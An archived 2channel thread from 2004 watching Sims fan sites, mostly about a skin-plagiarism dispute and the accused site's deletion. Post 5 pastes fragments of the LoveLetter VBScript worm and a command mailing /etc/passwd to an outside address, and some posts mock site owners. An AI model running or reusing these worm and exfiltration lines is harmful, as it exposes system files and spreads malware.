2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【全部ログ】シムピヲチスレ10【取ってますからね】

1 :名無しさん@ゴーゴーゴーゴー!:04/12/06 20:00:10 ID:XrcBMHwV
シムピ関連のサイト及び、そこに集う人々をマターリとヲチするスレです。

・ヲチ先への突撃(書き込みや荒らし行為、不正アクセス等)は厳禁です。
・私怨による荒らし依頼や個人情報晒し、コピペ荒らしも厳禁です。
・根拠なく他人を私怨扱いする人もいますので、自分の目で判断しましょう。
・直リン禁止。2ch外のURLは「http」の最初の「h」を抜きましょう。
・サイト名やHNは伏せ字・当て字を使いましょう。
・ヲチ板ではIP取るよ。

■ 前スレ
【大物不在】シムピヲチスレ9【小物でマターリ】
 http://ex5.2ch.net/test/read.cgi/net/1097251909/l50

関連スレ等は>>2以降

2 :名無しさん@ゴーゴーゴーゴー!:04/12/06 20:03:52 ID:XrcBMHwV
■ 過去スレ
【コマンツ】シムピープルサイトをヲチしよう【ナァラ?】
 http://ex.2ch.net/test/read.cgi/net/1065166177/l50
【ズゥンコ】シムピサイトをマターリヲチ 2餅魔【シム好き】
 http://ex.2ch.net/test/read.cgi/net/1067338475/l50
【シム好き】シムピサイトをマターリヲチ3【必死】
 http://ex.2ch.net/test/read.cgi/net/1068493790/l50
【AGE】シムピサイトをマターリヲチ4【SGE】
 http://ex.2ch.net/test/read.cgi/net/1071564555/l50
【勉強が】シムピヲチスレ5【全てではない】
 http://ex2.2ch.net/test/read.cgi/net/1074782933/l50
【リア友は】シムピヲチスレ6【一人だけ】
 http://ex5.2ch.net/test/read.cgi/net/1080892325/l50
【厨の隔離所】シムピヲチスレ7【アリガトデータ倶楽部】
 http://ex5.2ch.net/test/read.cgi/net/1090897240/l50
【質問厨】シムピヲチスレ8【自治厨】
 http://ex5.2ch.net/test/read.cgi/net/1094899949/l50

■ これまでの主要ヲチ対象
シムジマソ (長期休業中)
 ttp://simjiman.fc2web.com/index.html
What is sim (休眠中)
 ttp://whatissim.tn.st/
荒恵比寿堂
 ttp://arayebisu8350.hp.infoseek.co.jp/
シムパーンソデータ倶楽部(掲示板の質問厨・自治厨・風紀厨がヲチどころ)
 ttp://www4.ocn.ne.jp/~pepti/

3 :名無しさん@ゴーゴーゴーゴー!:04/12/06 21:16:41 ID:9AB5E0w0
>>1


4 :名無しさん@ゴーゴーゴーゴー!:04/12/06 22:45:12 ID:d3Qdvswc
>1乙
スレタイもいい感じだねw

5 :名無しさん@ゴーゴーゴーゴー!:04/12/06 22:56:51 ID:Uf/mERS2
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

6 :名無しさん@ゴーゴーゴーゴー!:04/12/06 23:40:56 ID:7g5XZcM+
>>1
前から思ってたんだけどいつもなんちゃってウィルス置いてく奴ってやっぱあの


何でもないです。

7 :名無しさん@ゴーゴーゴーゴー!:04/12/07 00:00:37 ID:xn+7ckU4
見るのには実害ないけど、しばらくギコの番号ずれるから小迷惑。

あなたもですか。
実は自分も前からそうなのかなと内心思ってたんですが
今まではまさかあの…もいくらなんでもここまで分かりやすい事するバうわ何をす(ryやめ!!!1

8 :名無しさん@ゴーゴーゴーゴー!:04/12/07 00:26:10 ID:M6Opsnu1
>>1さん乙

あ、これなんちゃってウィルスだたーの?
何の実害もないどころかホシュに貢献してるような気が…。

9 :名無しさん@ゴーゴーゴーゴー!:04/12/07 00:33:11 ID:xZ16B22B
一瞬びっくり&プチムカツキ効果があります>実害

10 :名無しさん@ゴーゴーゴーゴー!:04/12/07 00:38:09 ID:xZ16B22B
えーと、2日で80逝かなきゃいけないんだっけ?1週間だっけ?
とりあえず保守

11 :名無しさん@ゴーゴーゴーゴー!:04/12/07 00:59:30 ID:PxUMVQpQ
>1乙ー

保守ついでに荒恵比寿でひっぱる。
怖くて日記見に行ってないからよくわからんけど、
好きだからブックマークに入れてたらヲチャ認定されるってこと?
正直、ここでどんなに叩かれてようと好きだったからショックだ。
そんなに痛い人だと思ってなかった…(;´Д`)

12 :名無しさん@ゴーゴーゴーゴー!:04/12/07 01:16:53 ID:xn+7ckU4
お前…ちょっと見る目は無いけど、とてもいい奴だ…
海老タンよ、こんないい娘にも捨てられて…自業自得だから仕方ないね。

13 :名無しさん@ゴーゴーゴーゴー!:04/12/07 02:22:49 ID:fZcxJhkE
>>11は恵比寿のどこに「どんなに叩かれようと好きだ」ったのか気になる。
良かったら教えてくれないか。
だって、お世辞にも出来がよいスキンとは思えッ…ゲフンゲフン

14 :名無しさん@ゴーゴーゴーゴー!:04/12/07 02:24:12 ID:7VkCvt47
荒恵比寿おもしろいなー
もっと足掻いて閉鎖してくれればいいのに

15 :名無しさん@ゴーゴーゴーゴー!:04/12/07 02:54:11 ID:xn+7ckU4
ダメだよ!閉鎖なんかしたら寂しいだろ!
いつまでも元気でいてくれないと!

16 :名無しさん@ゴーゴーゴーゴー!:04/12/07 03:14:20 ID:We18tDZ7
ブクマから来ている人=ヲチャだと言っているってことは
「自分のサイトを好意でブックマークしているやつなんている筈ない」
って思っていることになるよね。
哀しい考え方だね…海老タンのことがちょっと心配になるよ。

17 :名無しさん@ゴーゴーゴーゴー!:04/12/07 06:04:51 ID:CWCF9Fzr
ホッシュッシュ
>>16 哀しいというより、そ こ だ け は冷静かもw

18 :名無しさん@ゴーゴーゴーゴー!:04/12/07 07:29:25 ID:+r5ucLmR
自分が嘘ついてばっかだから
疑心暗鬼でしか物見れないんだよな。

19 :名無しさん@ゴーゴーゴーゴー!:04/12/07 07:47:21 ID:gdw56dUK
私もそれ思った。
もう自分のサイトの常連は全部ヲチャだと思ってんだなーって。
それ思うとちょっと哀れっつか、奴はプチノイローゼになってんのかもしれん。
ま、自業自得だが。

>>11じゃないけど、
前スレで5日の日記のことを最初に見つけたのは私だけど、
その時は別にヲチしに行った訳じゃなかったんだよね。
2のスキンのチュートリアル(らしきもの?)を
ちょっと見せてもらおうと思って「久しぶりにブクマから」行ったの。
そして、ついでに日記を見て(別に他のサイトでもそうする。根がヲチャだからw)
あの内容を見つけたから、腹が立って悲しかったんだよ。
「用があって行った私もヲチャ認定されてアクセスログ晒しかい〜!!!」
って。そうじゃなかったら日記の更新くらいでヲチすれに書き込まない。
もう行かん。用があっても絶対に行くもんか。

恵比寿よ、藻舞はサイト運営に向いてないよ、もうやめれ(´・ω・`)


20 :名無しさん@ゴーゴーゴーゴー!:04/12/07 07:51:07 ID:A2J+5gA8
          _Y_
            r'。∧。y.
         ゝ∨ノ       >>このスレが              ,,,ィf...,,,__
          )~~(           無意味な時を      _,,.∠/゙`'''t-nヾ ̄"'''=ー-.....,,,
         ,i   i,           過ごしていく間に   ,z'"    ̄ ̄ /n゙゙''''ー--...
         ,i>   <i        文明はどんどん     r”^ヽ      く:::::|::|:::〔〕〔〕
         i>   <i.       発達していく・・・・。 , 入_,..ノ ℃      ̄U ̄_二ニ=
`=.,,ー- ...,,,__  |,r'''"7ヽ、|  __,,,... -ー,,.='             >ーz-,,,...--,‐,‐;;:'''""~
  ~''':x.,,  ~"|{ G ゝG }|"~  ,,z:''"                     ___
      ~"'=| ゝ、.3 _ノ |=''"~      <ー<>         /  l ̄ ̄\
        .|))    ((|        / ̄ ゙̄i;:、      「 ̄ ̄ ̄ ̄| ̄| ̄ ̄ ̄\
             ))|       r'´ ̄「中] ̄`ヾv、   `-◎──────◎一'
                   ├―┤=├―┤ |li:,
                   |「 ̄ |i ̄i|「.//||「ln|:;
                   ||//__|L_」||__.||l」u|:;
                   |ニ⊃|  |⊂ニ| || ,|/
                   |_. └ー┘ ._| ||/
                   ヘ 「 ̄ ̄ ̄| /


21 :名無しさん@ゴーゴーゴーゴー!:04/12/07 08:08:33 ID:+ovZhYag
>>20
どつらさん?

22 :名無しさん@ゴーゴーゴーゴー!:04/12/07 08:16:56 ID:ej65v5mR
覚えたてのコピペを一通りやってみたいんだね。

23 :名無しさん@ゴーゴーゴーゴー!:04/12/07 09:16:40 ID:avywKWcT
自分はヲチスレで恵比寿の存在を知った。
当時のネタはシーフ疑惑だったから、最初からヲチの目で見ていた。
ここであがる援護も「私怨か」オンリーだし
信者なんて一人もいないのかと思ってたけど、
ヲチ目的じゃなく好きだった人っていたんだね……

それはそうと、昨日の愚痴日記はもう消したのか。
日記の更新作業は早いのに、掲示板へのレスは遅いんだな。

24 :名無しさん@ゴーゴーゴーゴー!:04/12/07 11:24:14 ID:We18tDZ7
恵比寿を知ったのはシーフ疑惑の前だったな。
普通にサーチから行って普通にダウンロードしたよ、金岡のキャラ。
海老タンが取っているらしいログに当時のIPが残ってるんじゃないかなw
結局、スキンフォルダには入れなかったけれど、CD-Rに保存してある、
ダウンロードページも一緒に。
もう金岡のキャラは作らないという言葉の後に
>足らないキャラは自作するなり、他のサイト様にお願い(笑)するなりしてみて下され・・・・。
と書いてあってびっくりした。
他サイトだと職人にクレクレ言うなと書いてあるのが普通だから。
クレクレ厨に言質を与えるようなことをして、不思議な人だなと思った。
でもまさかシーフで、それがバレても謝罪なしで、
痛いことを書いては消すような人だとは思わなかった。
今度保存用DVD-Rを焼くつもりだけれど海老タンのは外して焼くよ。
さようなら海老タンのスキンたち。

25 :名無しさん@ゴーゴーゴーゴー!:04/12/07 13:35:19 ID:xmeHiX/z
とりあえず保守。
海老たん事情に疎いので話題に加われなくて残念。

26 :名無しさん@ゴーゴーゴーゴー!:04/12/07 13:43:00 ID:siXRV1Y3
>>20はシム隙のような気がしないでもない。

27 :名無しさん@ゴーゴーゴーゴー!:04/12/07 14:01:47 ID:/cSklpaX
ヲチ対象に人気のあるスレですね。

28 :名無しさん@ゴーゴーゴーゴー!:04/12/07 14:21:30 ID:xn+7ckU4
はい、ご愛顧いただいてます。

海老タンは春以降スレに常駐しているというのは
本人以外で反論する奴はいない事だと思うが
自分以外のサイト持ちの人の話題では
嬉々として叩く側だったりし…いや、まさかねえ。

29 :名無しさん@ゴーゴーゴーゴー!:04/12/07 15:03:21 ID:xn+7ckU4
海老タンの話題でシーフの事を思い出したんで
ちょっと気にかかってたスキンを開いて見たんだが
メッシュのシルエットが完全にかぶってしまった。
多分あれシーフイクナイ!(・A・)の意識が希薄なんだろうな…
万一、元スキンにメールで許可とってる可能性もあるんだが…
それならどこかに書くよなぁ。

悪気はそれほどなさそうなので、どうしようかかなり悩んだんだが、
先にシーフ本人に教えてやって片棒担ぐのもごめんだし
気付いたからには放置も出来ないから、報告に来たよ。

新規版権サイトの新規スキンだ。ちょっと特殊なやつ。
アクセス数が現在トップの所ではない。(誤解されたら悪いので)


30 :名無しさん@ゴーゴーゴーゴー!:04/12/07 15:09:47 ID:By4tspMn
サーチ見てみたけど、一体何処がパクラレ元で何処がパクリサイト
なのかすハッキリ分からん。憶測で話して関係無いサイトに迷惑が
掛かるとヤバイし、その二つを検証してうpして貰えんでしょうか?

31 :名無しさん@ゴーゴーゴーゴー!:04/12/07 15:19:19 ID:xn+7ckU4
それもそうだな…
パク元サイトに迷惑かかりそうで、気がすすまなかったんだが
考えてみたら、無関係サイトに疑惑がかかる方が酷いよな
話題を出してしまった責任あるし、ちょっと作ってくるよ。

32 :名無しさん@ゴーゴーゴーゴー!:04/12/07 16:29:16 ID:xn+7ckU4
出来ました。
http://cgi.2chan.net/up2/src/f66007.jpg
緑がパク疑惑。下のピンクがラレ元。
うpロダがどの位持つのか分からないので、ダウソ推奨です。
ダウソした人が持つ所に上げなおしてくれても構いません。

33 :名無しさん@ゴーゴーゴーゴー!:04/12/07 16:33:17 ID:xn+7ckU4
持つ所→長持ちする所、です。スマソ。

特殊なスキンだから、すぐ分かるだろうしサイト名までは勘弁。
元サイトが、このスキンの時にサーチを更新してなくて
後から見つけて驚いた記憶があるんだ。
だから、もしかして特殊スキンで目立ちたくなかったんじゃないかと
シーフ見つけてからずっと気が重い。
ここ、海老タンにも逆恨まれてそうな感じだし。
なんで今見つけちまったんだ、自分。

34 :名無しさん@ゴーゴーゴーゴー!:04/12/07 17:24:25 ID:eVXlya0s
ああ、見たことある。
ラレ元さんの使用規定には、改造を明記すればOKってことだったはず。
疑惑元には、そういう表示はなかった?

35 :名無しさん@ゴーゴーゴーゴー!:04/12/07 17:55:27 ID:xn+7ckU4
残念だけど、見る限り無みたいだ。
日記までは見ていないから分からないんだけど
普通そういうのはダウソページに書くものではないのかな?

気になって改めて見てみたが、ラレ元も二次配布は禁止みたいだ。
メールで許可してるのか、とも一瞬悩んだんだが
頼んで借りた奴が「かなりヘタッピな作りですが」なんて書くとは思えないんだよなぁ。

36 :名無しさん@ゴーゴーゴーゴー!:04/12/07 17:56:53 ID:kOrX3syv
>>33
元サイトさんは、「改造SS等の公開は改造箇所明記」&「改造配布禁止」になってるね。

37 :名無しさん@ゴーゴーゴーゴー!:04/12/07 17:57:56 ID:+r5ucLmR
どこの物だかサッパリで自分もメッシュ素人でスマソなんだが、
どっちも幕死すデフォが原型って可能性はないの?

38 :名無しさん@ゴーゴーゴーゴー!:04/12/07 17:59:03 ID:zbIA8y4a
>>34
"個人で使用する場合は”改造OK…じゃなかったっけ?
2次配布・改造配布は禁じてたような…。


39 :名無しさん@ゴーゴーゴーゴー!:04/12/07 18:00:11 ID:zbIA8y4a
ごめんなさい、ageた上に被ってるし…orz

40 :名無しさん@ゴーゴーゴーゴー!:04/12/07 18:05:18 ID:M6Opsnu1
>>37
服着たぬこは、デフォで配布しとらんじゃろう。

…とは思うけど、念のためデフォとどれだけ違いがあるのか
誰か検証よろしく。

41 :名無しさん@ゴーゴーゴーゴー!:04/12/07 18:11:09 ID:+r5ucLmR
ああホントだ、このぬこ服着てるね。
ちゃんと見ずにすまん。

42 :名無しさん@ゴーゴーゴーゴー!:04/12/07 18:32:21 ID:kOrX3syv
>>40
3D構造がデフォと同じかどうかは検証待ちだけど、テクスチャのマッピングは元サイトさんがやってると思う。

43 :名無しさん@ゴーゴーゴーゴー!:04/12/07 19:39:55 ID:s2i4hRQN
マッピングを見ると、パクリの可能性高そうだね…

44 :名無しさん@ゴーゴーゴーゴー!:04/12/07 19:40:28 ID:s2i4hRQN
すまんageてしまった(;´Д`)

45 :名無しさん@ゴーゴーゴーゴー!:04/12/07 19:43:08 ID:eVXlya0s
元サイトさん、『改造による再配布は禁止』って、きっちり書かれてましたね、
ゴメ…勘違いしてますた。>34
ヘッドスキン重ねて見たら、線が殆ど重なってた。ので…自分は黒判定します。

で、パクの同梱readmeのこれ…
>改造などはお好きなだけどうぞ。
>(できないくらいメチャクチャだからびっくりするけど・・・)
って、あなた、自ら改造してますがな。
それに、人様の作成したスキンファイルを『メチャクチャ』っていってるのと同じなのでは。

46 :名無しさん@ゴーゴーゴーゴー!:04/12/07 20:08:52 ID:xn+7ckU4
自分のせいで無実の罪を着せたらと責任を感じたので
catの000から018(002と015は欠番)を全て開いて見たが
重なるものも、形が近いものもなかったよ。
(見落としたぬこスキンがあったらスマソ)
前足と後足の形状が、普通のぬことはかなり違っていた。

これ悪気はないのかもな…と思いながらだったんだけど
リンクページ見てもパク元サイトは無いし
パク先のreadmeには「二次配布禁止」としっかり書いてあるのを見ると
自分が感じていたよりも悪質だと思えてきた。

47 :名無しさん@ゴーゴーゴーゴー!:04/12/07 20:10:20 ID:FLAbvvrU
黒っぽいね。
その上「感想切実希望中><」ですか。
他人のフンドシで「すごいですね〜」とか言われたいんだ。
あれだろ。「ヘタレだから><」とか言いまくってるのは
「そんなこと無いですよ〜」とか言って欲しいからか?
「><」コレが多用してあるだけでちょっとむかつく。
サイト全体も厨っぽいな、ここ。

48 :名無しさん@ゴーゴーゴーゴー!:04/12/07 20:16:32 ID:cIYE/ycb
真っ黒ならぬこシーフタソとしてデビューですな

49 :名無しさん@ゴーゴーゴーゴー!:04/12/07 20:16:42 ID:K+hY2LDD
検証乙
初めはシーフの事とかよく分かってない純粋な厨なのかと
思ったけど、二次配布禁止とかまるで自分が作ったように
「メチャクチャ」とか書いたりとホント悪質だな。

ヲチスレでシーフが発覚した場合って、パクラレ元に教えたり
するのは特攻になるのかな?

50 :名無しさん@ゴーゴーゴーゴー!:04/12/07 20:30:10 ID:Jt+ZSbhe
どこからどうみても別物じゃん

51 :名無しさん@ゴーゴーゴーゴー!:04/12/07 20:32:44 ID:M6Opsnu1
>>50
何が別物?

52 :名無しさん@ゴーゴーゴーゴー!:04/12/07 20:50:04 ID:cIYE/ycb
冷静に考えたら、これってシーフだから
ヒソーリヲチって楽しむべきものじゃなく
本人に止めさせるのが筋だよな。

自分は該当サイトわからないんでどうしようもないけど
わかってる人はラレ元に知らせてあげた方がいいんでないの?

53 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:03:01 ID:jZCDhmcC
ああ、ひさしぶりにアイドルが誕生するよ。

54 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:15:28 ID:eVXlya0s
>>32のうpファイル消えたみたいなので再うpします。
ttp://49uper.com:8080/html/img-s/27192.jpg


>>50、これでも別物と?

55 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:15:30 ID:9CKvnRjP
シーフの指摘を(ヲチャもしくはパクラレさんから)受けて
 ・何事も無かったように配布続行。
 ・配布は中止するが、その理由は明記しない。
 ・配布は中止するが、アテクシ知らなかっただけだもん、悪くないもん、と言い訳。
 ・シーフなんかしてないもん、全部アテクシが作ったんだもん、と逆ギレ。
 ・サイトごとあぼーん。
さあどう踊るかな…
パクラレさんは激しく乙です。
頑張って作ったものを配布してくれているのに
こんな面倒事に巻き込まれるなんて本当に気の毒だ。

56 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:19:26 ID:9CKvnRjP
>>54
以前、恵比寿のシーフ画像
(パクリ元のメッシュと恵比寿の配布してたメッシュが完全一致している対比画像)
がアップされたときも50と同じようなこと言ってるやつがいたなあ…

57 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:21:27 ID:8k5HnZPY
ラレ元だけでも教えてくんない?

58 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:28:10 ID:jZCDhmcC
>>57
>54の画像を見たら一目で分かったよ。
パクリもラレも。

59 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:30:24 ID:cIYE/ycb
今現在シムコンテンツに釈明文だけ載せて
意味不明コンテンツになってるサイト?

60 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:30:45 ID:gdw56dUK
パクラレさんを面倒ごとに巻き込まないためには、
ヲチャ(でも、この場合は閲覧者の立場だよね)からパクリサイト
へ直接指摘したほうが良いかもしれない。

61 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:33:04 ID:K+hY2LDD
今までシーフを指摘されて
「ごめんなさい、もうしません。本当に申し訳ありませ(ry」って
感じの謝罪文とかを載せるような奴は見た事無いからなぁ。
大概が開き直るか、認めても周りにバレたくないからサイト閉鎖したり
掲示板だけ閉鎖したりだったし、シーフするような奴はやっぱ根性曲がってるよ。

とか言って、パクリ側がシーフ物を下げ、それに関する謝罪文を載せて
ちゃんと反省してたとしたらどうしよう。まぁ有り得ないだろうけどw

62 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:35:17 ID:s2i4hRQN
シムスキンを作るにあたって、
確かにいろいろなサイト様の動物改造スキンを参考にしました。
そのものを開いた上での改造などはしていないです。
できるだけ近くなるように(近くなればきちんとなるかな、と思い)マネはしました。
そのことが盗作ということにあたると思われる方もいらっしゃるとの連絡を受けました。
私としましては、シムに入っている動物スキンをもとにし、
いろいろな人間を使った動物スキンを参考にしながら作っていったつもりでした。
ご迷惑をおかけしましたら、大変申し訳なく思います。

…だそうですよ。

63 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:36:34 ID:gdw56dUK
意味不明(´д`;)
こりゃ開き直りパターンだな。

64 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:36:41 ID:K+hY2LDD
ポカーン
あれだけ一致するのに盗作じゃないって、どの口が言うんだw
てか仮にまんま使ったんじゃないにしても、丸々似せて作ったら
パクリはパクリだろ。
ほんとシーフするような奴はどいつもこいつも一緒だな。

65 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:37:47 ID:8k5HnZPY
>いろいろな人間を使った動物スキン

意味不明・・・

66 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:37:58 ID:cIYE/ycb
やっぱそのサイトかー。
なんかこう思うと、なっちは潔いよな。

67 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:40:29 ID:jZCDhmcC
掲示板で
>まずはじめからまったく新しいキャラを作ろうとせずに、すでにあるキャラクターを改造することをすすめます。

っつってるじゃん。
すでにあるキャラクターを改造したんだろ?
マネパクで一からつくったんじゃないだろ?
認めて謝りなよ。

68 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:40:31 ID:K+hY2LDD
連投すまん
こいつサーチから早速登録解除してないか?
確かついさっきまでサーチの新着サイトに
あったはずなのに消えてる・・・。

こいつはもうアい$扱いでいいと思うよ

69 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:41:49 ID:gdw56dUK
>いろいろ言いたいことはありますが、私は2チャネルが苦手です。どうしてもだめです。
あとは勝手にお楽しみください。

逃げたぞーw


70 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:46:25 ID:s2i4hRQN
>>68
本当だ。消えてるね。

>>69の文章はどこの…?

71 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:46:57 ID:cIYE/ycb
びびえすデリしやがったー

72 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:47:55 ID:gdw56dUK
あれ、服来たぬこっていうからてっきりそこだと思ってたんだけど…
トップにこんな文章張ってあったし…違った?

サーチではランキングから逝けた。

73 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:48:08 ID:s2i4hRQN
>>70
ごめん、入り口の文章か。
もうサイト閉鎖なのか…?

74 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:49:33 ID:s2i4hRQN
うわ
リアルタイムでサイトが消えていく…

75 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:49:59 ID:K+hY2LDD
うわ、サイト全部デリったw
小心者のくせにシーフすんなよ。余りのチキンっぷりにハゲワラ

76 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:50:23 ID:cIYE/ycb
完全に逆切れだね。

77 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:52:31 ID:O/N3IlT2
あーあ、最低だな。
デリる前に見た小説とシム日記ちょっとと
メアドを晒してやりたい激しい衝動に駆られるな。
メアドはバイダのだったし、ここに1シムユーザーとして
苦情でも送ってやりたいよ

78 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:52:46 ID:9CKvnRjP
> Pr○ze開設。04/11/29午後より


そして今日04/12/07閉鎖…ワロタ

79 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:52:55 ID:cIYE/ycb
連レスすまん。
でもこれがどうしてもおかしくて…w

>2チャネル

80 :名無しさん@ゴーゴーゴーゴー!:04/12/07 21:53:17 ID:O/N3IlT2
>>79
震える手で打ったんじゃないか?w

81 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:00:10 ID:s2i4hRQN
ttp://www.uploda.org/file/uporg21201.gif

今更だけどBBSの問題発言の部分

82 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:01:44 ID:JZmf8umo
ttp://rio2000.gozaru.jp/
ブクマに入れとくのが面倒だからここに書いとく

83 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:04:45 ID:s2i4hRQN
ttp://www.uploda.org/file/uporg21202.gif

もういっちょ

84 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:06:29 ID:gdw56dUK
ったって、トップにゃもう捨て台詞しか残ってないし。
しかし何で2チャネル(w)のせいにするかな。
そりゃここがなけりゃ騒ぎにはならなかっただろうけど、
そもそも藻舞が無断改造品を配布したのが悪いんだろうが。

85 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:11:43 ID:kOrX3syv
謝罪して一旦スキンを下げ、頑張って本当に自作することを期待したんだがな・・・
やっぱ無理だったか・・・・
どっちのサイトも改造自体は禁止でないんだし、SS公表も出来るし、配布が問題。
(リンクぐらいはして欲しいが)
別サイトのスキン合体はまずいけど(常識)。
ちゃんと手続きを踏めば良いだけなのに、中国のサイトといい、恵比寿といい、今回といい
なんだかんぁ

86 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:19:08 ID:We18tDZ7
>>62の文章って全文?
見られなかったよ。

シムサーチ以外にも版権のサーチやリングに8つも入っていたのに
全部消して回るのか?サーチやリングの管理人にも迷惑な話だ。

恵比寿といい今回のといい、自分に都合の悪いことは即消しして
2ちゃんに晒されたアテクシカワイソウだけ残す。
そもそもお前が(ry

87 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:24:22 ID:9CKvnRjP
バレやすくなると思うのか、パクリ元へのリンクがないのもデフォ…って当たり前か。
というか、あんな特徴的なスキンをパクってバレないと思うのがアフォ過ぎ。
もちろん特徴的じゃなかったらパクっていいってわけじゃないけどな。
(というか、特徴的じゃない物からのシーフは表面化してないだけだろうな)

88 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:33:21 ID:zbIA8y4a
こういう香具師はリアルでも「自分の非を認めて謝罪する」ということが
できないんだろうね…。

ヲチ(というより2チャネル?)に晒されたから今回は2チャネルwのせい
にしてるけど、晒されなくてもメールで指摘されれば「嫌がらせメールの
せい」、BBSで指摘されれば「荒らしのせい」ってかんじで必ず誰か他人
を身代わりにして「アテクシ悪くないもん、被害者なんだもん」と言うような
気がする。

89 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:33:43 ID:s2i4hRQN
ついに2チャネル(w)の文も無くなったな
バイバイ…チキンハートのアイドル

90 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:34:50 ID:We18tDZ7
あっ、トップの捨て台詞も消えた。


91 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:40:27 ID:gdw56dUK
リアルタイムでここ見てるっしょ。

92 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:47:20 ID:XPxdqS+p
うおっ祭に乗り遅れた。全てが終った後か…。

93 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:53:57 ID:FLAbvvrU
>>50って案外本人かもな。

94 :名無しさん@ゴーゴーゴーゴー!:04/12/07 22:58:14 ID:JZmf8umo
ノ俺もそう思った

95 :名無しさん@ゴーゴーゴーゴー!:04/12/07 23:00:55 ID:y8Il/RMF
逆切れシーフで逃亡チキン
捨て台詞は2チャネル(w)でキメ

96 :名無しさん@ゴーゴーゴーゴー!:04/12/07 23:15:14 ID:M6Opsnu1
不思議で仕方がないんだが、「やってはいけない事だとわからなかった」
というのならまだ理解できる。(いけないが)
たとえば、症学生が初めてサイトを持ったりして、壁紙に好きな漫画の絵を
そのまま貼りまくったり。(無断転載っていうのがいけない事だとまだ知らない)

でも、このチキンはリドミに「2次配布になる行為はご遠慮ください」とまで
書いてある。自覚はあるのにどうしてこういう事をするんだろう。
バレないとでも思っているのかな。

それにしても稀に見るアフォさ加減だったな…(´д`;)

97 :名無しさん@ゴーゴーゴーゴー!:04/12/07 23:22:05 ID:s2i4hRQN
マンセーされたいという気持ちと
シーフがバレたらどうしようという気持ちを
天秤にのっけると、マンセーされたいという気持ちに傾くけど
小心者なのでバレちゃったからトンズラ。
こんな感じだと思う。

98 :名無しさん@ゴーゴーゴーゴー!:04/12/07 23:29:43 ID:cbdOnE9u
>>97
ああ上手いこと言うな。

踊りが速すぎて全部見られなかった。
 ・配布は中止するが、アテクシ知らなかっただけだもん、悪くないもん、と言い訳。
 ・シーフなんかしてないもん、全部アテクシが作ったんだもん、と逆ギレ。
 ・サイトごとあぼーん。
の複合ダンスだったな。

99 :名無しさん@ゴーゴーゴーゴー!:04/12/07 23:50:28 ID:sbXtH/Da
ちきしょーパク側もラレ元もわかんないうちに終了かよ!ヽ(`Д´)ノキー

100 :名無しさん@ゴーゴーゴーゴー!:04/12/07 23:52:57 ID:Azjv64AT
多分本当に悪気はなくて、ただアフォなだけなんだよ。
「二次配布になる行為」の線引きが致命的に下手なんじゃない?
配布サイト運営者として許されることじゃないけど。
若そうだし、そのうち自分の愚かさに気がついて
恥ずかしさにじたばたする羽目になるのでは。
ワタシ絶対悪くないでFAの恐れもあるけどね。
つらっと悪びれもなく再開したら、このスレ的にはおいしい。

>>13
出来は…だけど、欲しかったスキンを作ってくれていたという喜びの方が大きかった。
ここでは受け狙いみえみえとか言われてたけど、
スキン作るのってかなり手間がかかるし、
本当に好きじゃなければ作らないだろうと思ってた。
今は反省してる。

101 :名無しさん@ゴーゴーゴーゴー!:04/12/08 00:19:59 ID:/+DkPCo8
> その他自作スキン:仔海豚&髪長海豚(受け海豚><)
って書いていたけれど、どうみても髪長海豚って
有名サイトのスキンに傷と前髪かいただけ。
配布はしてないから規約違反ではなかったけれど…それで自作スキン?
そんな奴が一から特殊ペットスキン?
と、変だとは思っていた。
奴にとっての「自作スキン」ってどんな意味だったんだろう。
今となっては知るべくもないが
怖い答えが返ってきそうなので、ヲチャとしては聞いてみたい。

102 :名無しさん@ゴーゴーゴーゴー!:04/12/08 00:23:30 ID:WOE0TM01
>>100
お前本当に良い(悪く言えば甘いんだが)娘だな…

